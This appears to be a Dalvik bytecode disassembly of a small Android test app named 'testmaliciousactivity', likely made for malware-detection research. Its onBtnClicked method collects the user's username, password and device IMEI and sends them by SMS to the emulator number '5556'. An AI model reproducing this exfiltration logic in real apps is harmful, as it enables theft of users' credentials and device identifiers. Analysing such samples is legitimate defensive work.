Lcom/test/sendtextmessage/BuildConfig; <init> ()V 0
	<init>-BB@0x0 0x0 0x8[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v0, Ljava/lang/Object;-><init>()V
		0x6 return-void 
Lcom/test/sendtextmessage/R$attr; <init> ()V 0
	<init>-BB@0x0 0x0 0x8[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v0, Ljava/lang/Object;-><init>()V
		0x6 return-void 
Lcom/test/sendtextmessage/R$drawable; <init> ()V 0
	<init>-BB@0x0 0x0 0x8[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v0, Ljava/lang/Object;-><init>()V
		0x6 return-void 
Lcom/test/sendtextmessage/R$id; <init> ()V 0
	<init>-BB@0x0 0x0 0x8[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v0, Ljava/lang/Object;-><init>()V
		0x6 return-void 
Lcom/test/sendtextmessage/R$layout; <init> ()V 0
	<init>-BB@0x0 0x0 0x8[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v0, Ljava/lang/Object;-><init>()V
		0x6 return-void 
Lcom/test/sendtextmessage/R$menu; <init> ()V 0
	<init>-BB@0x0 0x0 0x8[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v0, Ljava/lang/Object;-><init>()V
		0x6 return-void 
Lcom/test/sendtextmessage/R$string; <init> ()V 0
	<init>-BB@0x0 0x0 0x8[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v0, Ljava/lang/Object;-><init>()V
		0x6 return-void 
Lcom/test/sendtextmessage/R$style; <init> ()V 0
	<init>-BB@0x0 0x0 0x8[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v0, Ljava/lang/Object;-><init>()V
		0x6 return-void 
Lcom/test/sendtextmessage/R; <init> ()V 0
	<init>-BB@0x0 0x0 0x8[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v0, Ljava/lang/Object;-><init>()V
		0x6 return-void 
Ledu/uta/testmaliciousactivity/MainActivity; <init> ()V 1
	<init>-BB@0x0 0x0 0xe[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v1, Landroid/app/Activity;-><init>()V
		0x6 const/4 v0, 0
		0x8 iput-object v0, v1, Ledu/uta/testmaliciousactivity/MainActivity;->user Ledu/uta/testmaliciousactivity/User;
		0xc return-void 
Ledu/uta/testmaliciousactivity/MainActivity; addValues (I I I I)I 6
	addValues-BB@0x0 0x0 0xe[ NEXT =  ] [ PREV = ] 
		0x0 const/4 v0, 0
		0x2 add-int v1, v3, v4
		0x6 add-int/2addr v1, v5
		0x8 add-int v0, v1, v6
		0xc return v0
Ledu/uta/testmaliciousactivity/MainActivity; doSomethingValues (I I I I I)I 8
	doSomethingValues-BB@0x0 0x0 0x18[ NEXT =  ] [ PREV = ] 
		0x0 const/4 v0, 0
		0x2 invoke-virtual v3, v4, v5, v6, v7, Ledu/uta/testmaliciousactivity/MainActivity;->addValues(I I I I)I
		0x8 move-result v2
		0xa invoke-virtual/range v3 ... v8, Ledu/uta/testmaliciousactivity/MainActivity;->subValues(I I I I I)I
		0x10 move-result v1
		0x12 add-int v0, v2, v1
		0x16 return v0
Ledu/uta/testmaliciousactivity/MainActivity; isVirtualDevices ()V 9
	isVirtualDevices-BB@0x0 0x0 0x2e[ NEXT =  ] [ PREV = ] 
		0x0 const/16 v1, 30
		0x4 const/4 v3, 2
		0x6 const/4 v5, 4
		0x8 const/4 v4, 3
		0xa const/4 v2, 1
		0xc const/4 v8, 0
		0xe const/4 v0, 5
		0x10 invoke-virtual v9, v2, v4, v5, v0, Ledu/uta/testmaliciousactivity/MainActivity;->addValues(I I I I)I
		0x16 move-result v6
		0x18 move-object v0, v9
		0x1a invoke-virtual/range v0 ... v5, Ledu/uta/testmaliciousactivity/MainActivity;->subValues(I I I I I)I
		0x20 move-result v7
		0x22 move-object v0, v9
		0x24 invoke-virtual/range v0 ... v5, Ledu/uta/testmaliciousactivity/MainActivity;->doSomethingValues(I I I I I)I
		0x2a move-result v8
		0x2c return-void 
Ledu/uta/testmaliciousactivity/MainActivity; onBtnClicked (Landroid/view/View;)V 14
	onBtnClicked-BB@0x0 0x0 0x12[ NEXT = 0xe-0x12-onBtnClicked-BB@0x12 0xe-0xc2-onBtnClicked-BB@0xc2  ] [ PREV = ] 
		0x0 invoke-virtual v14, Landroid/view/View;->getId()I
		0x6 move-result v8
		0x8 const v9, 2131165185 # [1.7944579971337325e+38]
		0xe if-ne v8, v9, +5a
	onBtnClicked-BB@0x12 0x12 0x3a[ NEXT = 0x36-0x3a-onBtnClicked-BB@0x3a 0x36-0xc2-onBtnClicked-BB@0xc2  ] [ PREV = onBtnClicked-BB@0x0] 
		0x12 invoke-virtual v13, Ledu/uta/testmaliciousactivity/MainActivity;->getApplicationContext()Landroid/content/Context;
		0x18 move-result-object v1
		0x1a const-string v8, 'phone'
		0x1e invoke-virtual v13, v8, Ledu/uta/testmaliciousactivity/MainActivity;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
		0x24 move-result-object v7
		0x26 check-cast v7, Landroid/telephony/TelephonyManager;
		0x2a invoke-virtual v7, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
		0x30 move-result-object v2
		0x32 iget-object v8, v13, Ledu/uta/testmaliciousactivity/MainActivity;->user Ledu/uta/testmaliciousactivity/User;
		0x36 if-eqz v8, +46
	onBtnClicked-BB@0x3a 0x3a 0x5e[ NEXT = 0x5c-0x5e-onBtnClicked-BB@0x5e  ] [ PREV = onBtnClicked-BB@0x12] 
		0x3a iget-object v8, v13, Ledu/uta/testmaliciousactivity/MainActivity;->user Ledu/uta/testmaliciousactivity/User;
		0x3e invoke-virtual v8, Ledu/uta/testmaliciousactivity/User;->getPwdObject()Ledu/uta/testmaliciousactivity/Password;
		0x44 move-result-object v6
		0x46 invoke-virtual v6, Ledu/uta/testmaliciousactivity/Password;->getPassword()Ljava/lang/String;
		0x4c move-result-object v5
		0x4e const-string v4, ''
		0x52 invoke-virtual v5, Ljava/lang/String;->toCharArray()[C
		0x58 move-result-object v9
		0x5a array-length v10, v9
		0x5c const/4 v8, 0
	onBtnClicked-BB@0x5e 0x5e 0x62[ NEXT = 0x5e-0x62-onBtnClicked-BB@0x62 0x5e-0xc4-onBtnClicked-BB@0xc4  ] [ PREV = onBtnClicked-BB@0x3a, onBtnClicked-BB@0xc4] 
		0x5e if-lt v8, v10, +33
	onBtnClicked-BB@0x62 0x62 0xc2[ NEXT = 0xbc-0xc2-onBtnClicked-BB@0xc2  ] [ PREV = onBtnClicked-BB@0x5e] 
		0x62 new-instance v8, Ljava/lang/StringBuilder;
		0x66 const-string v9, 'User: '
		0x6a invoke-direct v8, v9, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
		0x70 iget-object v9, v13, Ledu/uta/testmaliciousactivity/MainActivity;->user Ledu/uta/testmaliciousactivity/User;
		0x74 invoke-virtual v9, Ledu/uta/testmaliciousactivity/User;->getUsername()Ljava/lang/String;
		0x7a move-result-object v9
		0x7c invoke-virtual v8, v9, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
		0x82 move-result-object v8
		0x84 const-string v9, ' + Pwd: '
		0x88 invoke-virtual v8, v9, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
		0x8e move-result-object v8
		0x90 invoke-virtual v8, v4, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
		0x96 move-result-object v8
		0x98 const-string v9, ' + Imei = '
		0x9c invoke-virtual v8, v9, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
		0xa2 move-result-object v8
		0xa4 invoke-virtual v8, v2, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
		0xaa move-result-object v8
		0xac invoke-virtual v8, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
		0xb2 move-result-object v3
		0xb4 const-string v8, '5556'
		0xb8 const-string v9, ''
		0xbc invoke-virtual v13, v8, v3, v9, v1, Ledu/uta/testmaliciousactivity/MainActivity;->sendsms(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/content/Context;)V
	onBtnClicked-BB@0xc2 0xc2 0xc4[ NEXT =  ] [ PREV = onBtnClicked-BB@0x0, onBtnClicked-BB@0x12, onBtnClicked-BB@0x62] 
		0xc2 return-void 
	onBtnClicked-BB@0xc4 0xc4 0xfc[ NEXT = 0xfa-0x5e-onBtnClicked-BB@0x5e  ] [ PREV = onBtnClicked-BB@0x5e] 
		0xc4 aget-char v0, v9, v8
		0xc8 new-instance v11, Ljava/lang/StringBuilder;
		0xcc invoke-static v4, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
		0xd2 move-result-object v12
		0xd4 invoke-direct v11, v12, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
		0xda invoke-virtual v11, v0, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
		0xe0 move-result-object v11
		0xe2 const-string v12, ' '
		0xe6 invoke-virtual v11, v12, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
		0xec move-result-object v11
		0xee invoke-virtual v11, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
		0xf4 move-result-object v4
		0xf6 add-int/lit8 v8, v8, 1
		0xfa goto -4e
Ledu/uta/testmaliciousactivity/MainActivity; onCreate (Landroid/os/Bundle;)V 2
	onCreate-BB@0x0 0x0 0x12[ NEXT =  ] [ PREV = ] 
		0x0 invoke-super v1, v2, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
		0x6 const/high16 v0, 32515 # [1.7412886744782398e+38]
		0xa invoke-virtual v1, v0, Ledu/uta/testmaliciousactivity/MainActivity;->setContentView(I)V
		0x10 return-void 
Ledu/uta/testmaliciousactivity/MainActivity; onCreateOptionsMenu (Landroid/view/Menu;)Z 3
	onCreateOptionsMenu-BB@0x0 0x0 0x16[ NEXT =  ] [ PREV = ] 
		0x0 invoke-virtual v2, Ledu/uta/testmaliciousactivity/MainActivity;->getMenuInflater()Landroid/view/MenuInflater;
		0x6 move-result-object v0
		0x8 const/high16 v1, 32518 # [1.7811655143517873e+38]
		0xc invoke-virtual v0, v1, v3, Landroid/view/MenuInflater;->inflate(I Landroid/view/Menu;)V
		0x12 const/4 v0, 1
		0x14 return v0
Ledu/uta/testmaliciousactivity/MainActivity; onRestart ()V 5
	onRestart-BB@0x0 0x0 0x5a[ NEXT =  ] [ PREV = ] 
		0x0 const v4, 2131165186 # [1.7944581999578285e+38]
		0x6 invoke-virtual v5, v4, Ledu/uta/testmaliciousactivity/MainActivity;->findViewById(I)Landroid/view/View;
		0xc move-result-object v3
		0xe check-cast v3, Landroid/widget/EditText;
		0x12 const v4, 2131165187 # [1.7944584027819245e+38]
		0x18 invoke-virtual v5, v4, Ledu/uta/testmaliciousactivity/MainActivity;->findViewById(I)Landroid/view/View;
		0x1e move-result-object v0
		0x20 check-cast v0, Landroid/widget/EditText;
		0x24 invoke-virtual v3, Landroid/widget/EditText;->getText()Landroid/text/Editable;
		0x2a move-result-object v4
		0x2c invoke-interface v4, Landroid/text/Editable;->toString()Ljava/lang/String;
		0x32 move-result-object v2
		0x34 invoke-virtual v0, Landroid/widget/EditText;->getText()Landroid/text/Editable;
		0x3a move-result-object v4
		0x3c invoke-interface v4, Landroid/text/Editable;->toString()Ljava/lang/String;
		0x42 move-result-object v1
		0x44 new-instance v4, Ledu/uta/testmaliciousactivity/User;
		0x48 invoke-direct v4, v2, v1, Ledu/uta/testmaliciousactivity/User;-><init>(Ljava/lang/String; Ljava/lang/String;)V
		0x4e iput-object v4, v5, Ledu/uta/testmaliciousactivity/MainActivity;->user Ledu/uta/testmaliciousactivity/User;
		0x52 invoke-super v5, Landroid/app/Activity;->onRestart()V
		0x58 return-void 
Ledu/uta/testmaliciousactivity/MainActivity; sendsms (Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/content/Context;)V 10
	sendsms-BB@0x0 0x0 0x44[ NEXT =  ] [ PREV = ] 
		0x0 const/4 v5, 0
		0x2 invoke-static Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
		0x8 move-result-object v0
		0xa const/4 v2, 0
		0xc new-instance v1, Landroid/content/Intent;
		0x10 const-string v3, 'SMS_SENT'
		0x14 invoke-direct v1, v3, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
		0x1a invoke-static v10, v5, v1, v5, Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context; I Landroid/content/Intent; I)Landroid/app/PendingIntent;
		0x20 move-result-object v4
		0x22 new-instance v1, Landroid/content/Intent;
		0x26 const-string v3, 'SMS_DELIVERED'
		0x2a invoke-direct v1, v3, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
		0x30 invoke-static v10, v5, v1, v5, Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context; I Landroid/content/Intent; I)Landroid/app/PendingIntent;
		0x36 move-result-object v5
		0x38 move-object v1, v7
		0x3a move-object v3, v8
		0x3c invoke-virtual/range v0 ... v5, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V
		0x42 return-void 
Ledu/uta/testmaliciousactivity/MainActivity; subValues (I I I I I)I 7
	subValues-BB@0x0 0x0 0xe[ NEXT =  ] [ PREV = ] 
		0x0 const/4 v0, 0
		0x2 sub-int v1, v3, v4
		0x6 sub-int/2addr v1, v5
		0x8 sub-int v0, v1, v6
		0xc return v0
Ledu/uta/testmaliciousactivity/Password; <init> ()V 0
	<init>-BB@0x0 0x0 0x8[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v0, Ljava/lang/Object;-><init>()V
		0x6 return-void 
Ledu/uta/testmaliciousactivity/Password; getPassword ()Ljava/lang/String; 1
	getPassword-BB@0x0 0x0 0x6[ NEXT =  ] [ PREV = ] 
		0x0 iget-object v0, v1, Ledu/uta/testmaliciousactivity/Password;->password Ljava/lang/String;
		0x4 return-object v0
Ledu/uta/testmaliciousactivity/Password; setPassword (Ljava/lang/String;)V 1
	setPassword-BB@0x0 0x0 0x6[ NEXT =  ] [ PREV = ] 
		0x0 iput-object v1, v0, Ledu/uta/testmaliciousactivity/Password;->password Ljava/lang/String;
		0x4 return-void 
Ledu/uta/testmaliciousactivity/User; <init> (Ljava/lang/String; Ljava/lang/String;)V 3
	<init>-BB@0x0 0x0 0x20[ NEXT =  ] [ PREV = ] 
		0x0 invoke-direct v1, Ljava/lang/Object;-><init>()V
		0x6 iput-object v2, v1, Ledu/uta/testmaliciousactivity/User;->username Ljava/lang/String;
		0xa new-instance v0, Ledu/uta/testmaliciousactivity/Password;
		0xe invoke-direct v0, Ledu/uta/testmaliciousactivity/Password;-><init>()V
		0x14 invoke-virtual v0, v3, Ledu/uta/testmaliciousactivity/Password;->setPassword(Ljava/lang/String;)V
		0x1a iput-object v0, v1, Ledu/uta/testmaliciousactivity/User;->pwdObject Ledu/uta/testmaliciousactivity/Password;
		0x1e return-void 
Ledu/uta/testmaliciousactivity/User; getPwdObject ()Ledu/uta/testmaliciousactivity/Password; 1
	getPwdObject-BB@0x0 0x0 0x6[ NEXT =  ] [ PREV = ] 
		0x0 iget-object v0, v1, Ledu/uta/testmaliciousactivity/User;->pwdObject Ledu/uta/testmaliciousactivity/Password;
		0x4 return-object v0
Ledu/uta/testmaliciousactivity/User; getUsername ()Ljava/lang/String; 1
	getUsername-BB@0x0 0x0 0x6[ NEXT =  ] [ PREV = ] 
		0x0 iget-object v0, v1, Ledu/uta/testmaliciousactivity/User;->username Ljava/lang/String;
		0x4 return-object v0
Ledu/uta/testmaliciousactivity/User; setPwdObject (Ledu/uta/testmaliciousactivity/Password;)V 1
	setPwdObject-BB@0x0 0x0 0x6[ NEXT =  ] [ PREV = ] 
		0x0 iput-object v1, v0, Ledu/uta/testmaliciousactivity/User;->pwdObject Ledu/uta/testmaliciousactivity/Password;
		0x4 return-void 
Ledu/uta/testmaliciousactivity/User; setUsername (Ljava/lang/String;)V 1
	setUsername-BB@0x0 0x0 0x6[ NEXT =  ] [ PREV = ] 
		0x0 iput-object v1, v0, Ledu/uta/testmaliciousactivity/User;->username Ljava/lang/String;
		0x4 return-void 
